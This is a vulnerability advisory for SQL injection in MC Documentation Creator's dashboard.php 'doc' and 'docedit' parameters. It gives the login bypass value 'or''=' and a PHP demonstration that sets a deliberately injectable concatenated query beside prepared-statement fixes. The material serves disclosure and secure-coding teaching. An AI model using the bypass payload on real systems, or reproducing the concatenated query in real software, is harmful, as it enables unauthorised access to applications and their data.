Vendor: MC Documentation Creator
By: İhsan Şencan
CVSS: 8.8 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: MC Documentation Creator
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017
SQL Injection Web Vulnerability
The vulnerability exists due to improper validation of user-supplied input in the 'doc' and 'docedit' parameters of the 'dashboard.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the application's database. An attacker can also bypass the authentication process by setting the username and password to 'or''='.
Mitigation:
Input validation should be implemented to prevent SQL injection attacks. It is also recommended to use prepared statements when interacting with the database.
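The mitigation above, as an added example (not code from the product or from the advisory): a concatenated login query shown beside a prepared-statement login, plus an integer-validated, bound lookup for the 'doc' parameter. The in-memory SQLite database, the table, column and function names, and the assumption that 'doc' is a numeric id are all constructed for illustration.

```php
<?php
// Added illustration: schema, data and function names are assumptions, not the product's code.
// Requires the pdo_sqlite extension; everything runs against an in-memory database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)");
$db->exec("CREATE TABLE docs (id INTEGER PRIMARY KEY, title TEXT)");
$db->prepare("INSERT INTO users (username, password_hash) VALUES (?, ?)")
   ->execute(['admin', password_hash('constructed-password', PASSWORD_DEFAULT)]);
$db->exec("INSERT INTO docs (title) VALUES ('Install guide')");

// Vulnerable pattern: user input is pasted into the SQL text, so quotes in it change the query.
function login_concat(PDO $db, string $user, string $pass): bool {
    $sql = "SELECT id FROM users WHERE username = '$user' AND password_hash = '$pass'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened: the username is a bound parameter (data only); the password is checked against its hash.
function login_prepared(PDO $db, string $user, string $pass): bool {
    $st = $db->prepare("SELECT password_hash FROM users WHERE username = :u");
    $st->execute([':u' => $user]);
    $hash = $st->fetchColumn();
    return $hash !== false && password_verify($pass, $hash);
}

// Hardened 'doc' lookup: validate as a positive integer, then bind it with an explicit type.
function fetch_doc(PDO $db, string $doc): ?array {
    $id = filter_var($doc, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject anything that is not a plain positive integer
    }
    $st = $db->prepare("SELECT id, title FROM docs WHERE id = :id");
    $st->bindValue(':id', $id, PDO::PARAM_INT);
    $st->execute();
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

$input = "'or''='"; // the username/password value quoted in the description above
printf("concatenated login accepts it: %s\n", var_export(login_concat($db, $input, $input), true));
printf("prepared login accepts it:     %s\n", var_export(login_prepared($db, $input, $input), true));
printf("prepared login, real password: %s\n",
    var_export(login_prepared($db, 'admin', 'constructed-password'), true));
printf("doc=1 found:                   %s\n", var_export(fetch_doc($db, '1') !== null, true));
printf("doc='1 OR 1=1' found:          %s\n", var_export(fetch_doc($db, '1 OR 1=1') !== null, true));
```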